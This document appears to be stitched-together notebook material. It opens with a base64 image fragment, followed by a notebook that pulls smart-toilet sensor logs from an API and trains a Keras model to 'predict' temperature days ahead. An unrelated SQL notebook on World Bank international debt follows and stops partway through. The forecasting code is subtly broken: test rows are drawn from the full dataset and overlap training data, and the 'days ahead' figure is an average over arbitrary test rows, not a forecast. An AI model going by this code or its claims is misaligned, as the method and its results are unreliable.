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
" width="200"/>
</div>
**API Validation & Prediction** <br>
This document validates the gathered API data and shows that it can be used for predictions and analyses
***Temperature Prediction*** <br>
To start off, machine learning is used to predict the temperature in the toilet a certain number of days ahead. Using a basic linear regression model, it is possible to predict the temperature based on the API data generated by the device.
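As a minimal illustration of the idea (a standalone sketch with made-up readings, not the notebook's actual device data), a linear model can be fit to timestamped temperatures and extrapolated forward:

```python
import numpy as np

# Hypothetical daily temperature readings: day index -> degrees Celsius
days = np.array([0, 1, 2, 3, 4], dtype=float)
temps = np.array([19.0, 19.5, 20.1, 20.4, 21.0])

# Least-squares line: temp ≈ slope * day + intercept
slope, intercept = np.polyfit(days, temps, 1)

# Extrapolate to day 10
prediction = slope * 10 + intercept
print(round(prediction, 2))
```

The notebook below does the same kind of extrapolation, but with a small neural network instead of a plain least-squares fit.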
# Imports <br>
In the first stage of the notebook, all imports needed by the code later in the notebook are made
```
import urllib.request
import json
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import datetime
from sklearn.model_selection import train_test_split
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
print(tf.__version__)
# Disable copy warn
pd.options.mode.chained_assignment = None # default='warn'
```
# Fetching API <br>
First, gather the API data from the URL. After that, display the last rows of the fetched data
```
with urllib.request.urlopen("https://us-central1-bava-solutions.cloudfunctions.net/GetLogsOfADevice/.F0:08:D1:D8:07:D4") as url:
data = json.loads(url.read().decode())
df = pd.DataFrame(data)
df.tail()
# df['timestamp'][0]
```
# Plotting the data
```
df.plot(x='timestamp', y='tvoc_co2')
# Reading TVOC
df = pd.DataFrame(data)
df.plot(x='timestamp', y='tvoc_ppm')
# Reading humidity
df.plot(x='timestamp', y='hum')
# Reading temperature
df.plot(x='timestamp', y='temp')
```
# The numbers, Mason <br>
The numbers, Mason, what do they mean?
```
# Getting all triggers by occupation
triggered_by_occupation = df[df['occupied']==1]
triggered_by_occupation.count()['occupied']
# Getting all triggers by timer
triggered_by_timer = df[df['occupied']==0]
triggered_by_timer.count()['occupied']
```
# Predictions <br>
**Predictions based on Machine learning data**<br>
First prediction is determining what the temperature might be in a few days.
```
# Tensorflow
np.set_printoptions(precision=3, suppress=True)
```
# Cleaning the data <br>
Drop any rows with missing or null values. Drop timestamp and mac because they are categorical and irrelevant, and drop batteryLevel and liquidLevel because they contain the same value in every row (occupied is dropped as well).
```
dataset = df.copy()
dataset.isna().sum()
dataset = dataset.dropna()
cleaned_dataset = dataset.drop(['mac', 'batteryLevel', 'liquidLevel', 'occupied'], axis=1)
temp = cleaned_dataset
for i in range(len(cleaned_dataset['timestamp'])):
cleaned_dataset['timestamp'][i] = datetime.datetime.utcfromtimestamp((cleaned_dataset['timestamp'][i]['_seconds']) ).strftime('%Y-%m-%d')
cleaned_dataset.index = pd.to_datetime(cleaned_dataset['timestamp'])
cleaned_dataset = cleaned_dataset[cleaned_dataset['tvoc_ppm'] != 0]
cleaned_dataset = cleaned_dataset.drop(['timestamp'], axis=1)
cleaned_dataset
```
# Splitting for regression using TensorFlow
```
train_data = cleaned_dataset.sample(frac=0.5, random_state=0)
test_data = cleaned_dataset.drop(train_data.index).sample(frac=0.4, random_state=0)  # ~20% of the full set, disjoint from the training rows
# test_data
# cleaned_dataset = cleaned_dataset.drop(['timestamp'], axis=1)
# train_data, test_data = np.split(cleaned_dataset, [int(.3 *len(data))])
train_data
print(len(test_data), len(train_data), len(cleaned_dataset))
# Y = cleaned_dataset['temp']
# x = cleaned_dataset.loc[:, cleaned_dataset.columns != 'temp']
```
# Split attributes and labels apart
```
train_features = train_data.copy()
test_features = test_data.copy()
train_labels = train_features.pop('temp')
test_labels = test_features.pop('temp')
train_labels
train_data = train_data.drop(['temp'], axis=1)
test_data = test_data.drop(['temp'], axis=1)
print(test_data)
# train_dataset_timeseries = keras.preprocessing.timeseries_dataset_from_array(train_data, train_labels, sequence_length=len(train_data))
# TimeSeries
train_stat = train_data.describe().transpose()[['mean', 'std']]
train_stat
```
# Normalization <br>
***Standardizing the features (zero mean, unit variance) puts them on a comparable scale, which helps the model train***
```
def normalize(row):
# t = row['timestamp']
answer = (row - train_stat['mean']) / train_stat['std']
print(row, answer)
# answer['timestamp'] = t
return answer
normed_train = normalize(train_data)
normed_test = normalize(test_data)
print(normed_test)
normed_train = np.asarray(normed_train).astype(np.float32)
normed_test = np.asarray(normed_test).astype(np.float32)
# normed_train
# normed_test
train_labels
```
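As a quick standalone check of what the `normalize` helper above computes (a minimal sketch with made-up numbers; pandas' `describe()` reports the sample standard deviation, so `ddof=1` is used to match):

```python
import numpy as np

# Hypothetical temperature column (made-up values, not the notebook's data)
train_col = np.array([18.0, 20.0, 22.0, 24.0])

# Match pandas' describe(): sample std with ddof=1
mean, std = train_col.mean(), train_col.std(ddof=1)
normed = (train_col - mean) / std

# After standardizing, the column has mean ~0 and sample std ~1
print(normed.mean(), normed.std(ddof=1))
```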
# Building the model using TensorFlow Keras
```
# Build the model inside a function so that it is easy to create multiple models later on
def create_model():
model = keras.Sequential([
layers.Dense(64, activation=tf.nn.relu, input_shape=[len(train_data.keys())]),
layers.Dense(1)
])
optimiser = tf.keras.optimizers.RMSprop(0.001)
model.compile(loss='mse', optimizer=optimiser, metrics=['mae', 'mse'])
return model
model = create_model()
```
# Insights of the model
```
model.summary() # Overview of the created model
early_block = keras.callbacks.EarlyStopping(monitor='val_loss', patience=100) # Stop training early once the validation loss stops improving
# Training model
full_model = model.fit(normed_train, train_labels, epochs=10000, validation_split=0.2, verbose=0, callbacks=[early_block]) # Actual model training
```
# Model training validation
How well did the model train? How did the loss evolve?
```
losses = pd.DataFrame(model.history.history)
losses.plot() # Plot the loss
```
## Model Testing
```
# Testing the model on the test set: X = time step, Y = predicted temperature
testmodel = pd.DataFrame(model.predict(normed_test))
testmodel.plot()
# Predict what the temperature will be after x amount of days
howmany = 90  # number of days ahead
answer = model.predict([normed_test[0:(howmany % len(normed_test))]])
print(f"The temperature would be {answer.mean()} degrees after {howmany} days")
```
## 1. The World Bank's international debt data
<p>It's not that we humans only take debts to manage our necessities. A country may also take debt to manage its economy. For example, infrastructure spending is one costly ingredient required for a country's citizens to lead comfortable lives. <a href="https://www.worldbank.org">The World Bank</a> is the organization that provides debt to countries.</p>
<p>In this notebook, we are going to analyze international debt data collected by The World Bank. The dataset contains information about the amount of debt (in USD) owed by developing countries across several categories. We are going to find the answers to questions like: </p>
<ul>
<li>What is the total amount of debt that is owed by the countries listed in the dataset?</li>
<li>Which country owes the maximum amount of debt and what does that amount look like?</li>
<li>What is the average amount of debt owed by countries across different debt indicators?</li>
</ul>
<p><img src="https://assets.datacamp.com/production/project_754/img/image.jpg" alt=""></p>
<p>The first line of code connects us to the <code>international_debt</code> database where the table <code>international_debt</code> is residing. Let's first <code>SELECT</code> <em>all</em> of the columns from the <code>international_debt</code> table. Also, we'll limit the output to the first ten rows to keep the output clean.</p>
```
%%sql
postgresql:///international_debt
```
## 2. Finding the number of distinct countries
<p>From the first ten rows, we can see the amount of debt owed by <em>Afghanistan</em> in the different debt indicators. But we do not know the number of different countries we have on the table. There are repetitions in the country names because a country is most likely to have debt in more than one debt indicator. </p>
<p>Without a count of unique countries, we will not be able to perform our statistical analyses holistically. In this section, we are going to extract the number of unique countries present in the table. </p>
```
%%sql
SELECT COUNT(DISTINCT country_name) AS total_distinct_countries
FROM international_debt;
```
## 3. Finding out the distinct debt indicators
<p>We can see there are a total of 124 countries present in the table. As we saw in the first section, there is a column called <code>indicator_name</code> that briefly specifies the purpose of taking the debt. Just beside that column, there is another column called <code>indicator_code</code> which symbolizes the category of these debts. Knowing about these various debt indicators will help us to understand the areas in which a country can be indebted. </p>
```
%%sql
SELECT DISTINCT indicator_code AS distinct_debt_indicators
FROM international_debt
ORDER BY distinct_debt_indicators;
```
## 4. Totaling the amount of debt owed by the countries
<p>As mentioned earlier, the financial debt of a particular country represents its economic state. But if we were to project this on an overall global scale, how will we approach it?</p>
<p>Let's switch gears from the debt indicators now and find out the total amount of debt (in USD) that is owed by the different countries. This will give us a sense of how the overall economy of the entire world is holding up.</p>
```
%%sql
SELECT ROUND(SUM(debt)/1000000, 2) AS total_debt
FROM international_debt;
```
## 5. Country with the highest debt
<p>"Human beings cannot comprehend very large or very small numbers. It would be useful for us to acknowledge that fact." - <a href="https://en.wikipedia.org/wiki/Daniel_Kahneman">Daniel Kahneman</a>. That is more than <em>3 million <strong>million</strong></em> USD, an amount which is really hard for us to fathom. </p>
<p>Now that we have the exact total of the amounts of debt owed by several countries, let's now find out the country that owes the highest amount of debt along with the amount. <strong>Note</strong> that this debt is the sum of different debts owed by a country across several categories. This will help us to understand more about the country in terms of its socio-economic scenarios. We can also find out the category in which the country owes its highest debt. But we will leave that for now. </p>
```
%%sql
SELECT
country_name,
ROUND(SUM(debt),2) AS total_debt
FROM international_debt
GROUP BY country_name
ORDER BY total_debt DESC
LIMIT 1;
```
## 6. Average amount of debt across indicators
<p>So, it was <em>China</em>. A more in-depth breakdown of China's debts can be found <a href="https://datatopics.worldbank.org/debt/ids/country/CHN">here</a>. </p>
<p>We now have a brief overview of the dataset and a few of its summary statistics. We already have an idea of the different debt indicators in which the countries owe their debts. We can dig even further to find out, on average, how much debt a country owes across each indicator. This will give us a better sense of the distribution of the amount of debt across different indicators.</p>
```
%%sql
SELECT
indicator_code AS debt_indicator,
indicator_name,
ROUND(AVG(debt),2) AS average_debt
FROM international_debt
GROUP BY debt_indicator, indicator_name
ORDER BY average_debt DESC
LIMIT 10;
```
## 7. The highest amount of principal repayments
<p>We can see that the indicator <code>DT.AMT.DLXF.CD</code> tops the chart of average debt. This category includes repayment of long-term debts. Countries take on long-term debt to acquire immediate capital. More information about this category can be found <a href="https://datacatalog.worldbank.org/principal-repayments-external-debt-long-term-amt-current-us-0">here</a>. </p>
<p>An interesting observation in the above finding is that there is a huge difference in the amounts of the indicators after the second one. This indicates that the first two indicators might be the most severe categories in which the countries owe their debts.</p>
